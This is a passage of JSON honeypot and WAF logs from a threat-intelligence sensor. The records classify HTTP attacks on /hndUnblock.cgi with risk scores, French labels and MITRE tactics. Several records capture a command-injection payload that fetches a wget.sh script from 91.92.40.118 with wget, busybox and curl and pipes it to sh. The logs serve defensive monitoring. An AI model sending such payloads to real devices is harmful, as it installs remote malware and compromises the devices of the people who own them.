\u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 8 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":292},{"id":11860738,"ip":"45.156.87.213","ts":"2026-07-14 08:22:32.000000","proto":"tcp","src_port":59632,"dst_port":81,"service":"http","classification":"http_smuggling_probe","waf_score":41,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/hndUnblock.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u0022b49e2ce11732566567c2a35c365676c189916029\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 442, \u0022payload_entropy\u0022: 5.323570247701941, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 79, \u0022tag_count\u0022: 10, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00228bc64e05961e034ba566be76e7b4d8221346fdaa\u0022, \u0022event_fingerprint\u0022: \u0022d4eb4bb7f55c2475c91eda8f5eff2aa1b185ad34\u0022, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022confidence\u0022: 0.95, \u0022classification_confidence\u0022: 0.95, \u0022precision_score\u0022: 84, \u0022precision_signals\u0022: [\u0022pat-0842\u0022], \u0022kb_rule_ids\u0022: [\u0022pat-0842\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 79}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 95.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002208af5a78575b289a95931d6464de05d9\u0022, \u0022path_pattern_hash\u0022: \u00227e7da887259ec686429949e3a182bb9c\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 79}, \u0022payload_preview\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConnec\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/hndUnblock.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConnection: close\\r\\n\\r\\nttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lunblk%3Bbusybox%20wget%20http:\/\u0022, \u0022payload_snippet\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConnec\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/hndUnblock.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConnection: close\\r\\n\\r\\nttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lunblk%3Bbusybox%20wget%20http:\/\u0022, \u0022payload_snippet\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConnec\u0022, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022web_injection\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022571be8b6c52856ae55d7c8db6af142ff926d90e7\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/hndUnblock.cgi\u0022, \u0022request_line\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConnec\u0022, \u0022attack_vector\u0022: \u0022http smuggling probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/hndUnblock.cgi\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 Motif catalogue confirm\u00e9 \u00b7 6 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 79\/100 (\u00c9lev\u00e9) \u2014 MITRE TA0001 \u2014 confiance 95 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 95, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 79}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 79, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022pat-0842\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022pat-0842\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/hndUnblock.cgi\u0022, \u0022request_line\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022http smuggling probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/hndUnblock.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/hndUnblock.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 299\\r\\nConnec\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 Motif catalogue confirm\u00e9 \u00b7 6 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 95 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":442},{"id":11860739,"ip":"45.156.87.213","ts":"2026-07-14 08:22:32.000000","proto":"tcp","src_port":59646,"dst_port":81,"service":"http","classification":"lfi_path_traversal","waf_score":48,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u0022875060f63f6f9b01b3fa72fee9673a1d2beb64f6\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 291, \u0022payload_entropy\u0022: 5.132100747767919, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 10, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u002243ce42d445bc01eea8fd33471e38cdf3a2a66dea\u0022, \u0022event_fingerprint\u0022: \u0022a7381068764a861b05e8941af874f0719b05e02a\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00224beb4156032c0cba1982095a899fe13b\u0022, \u0022path_pattern_hash\u0022: \u00227e7da887259ec686429949e3a182bb9c\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60\u0022, \u0022query_string\u0022: \u0022ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20h\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60\u0022, \u0022query_string\u0022: \u0022ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhablk%60 HTTP\/1.1\\r\\nHost: 6\u0022, \u0022payload_snippet\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20h\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022f278c2ac2b9f0576ac5931001b1cbc557c123400\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lhab\u2026\u0022, \u0022request_line\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bcurl%20http:\/\/91.\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/hndUnblock.cgi?ttcp_ip=-h%20%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20wget%20h\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lhablk%3Bbusybox%20w\u2026\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, 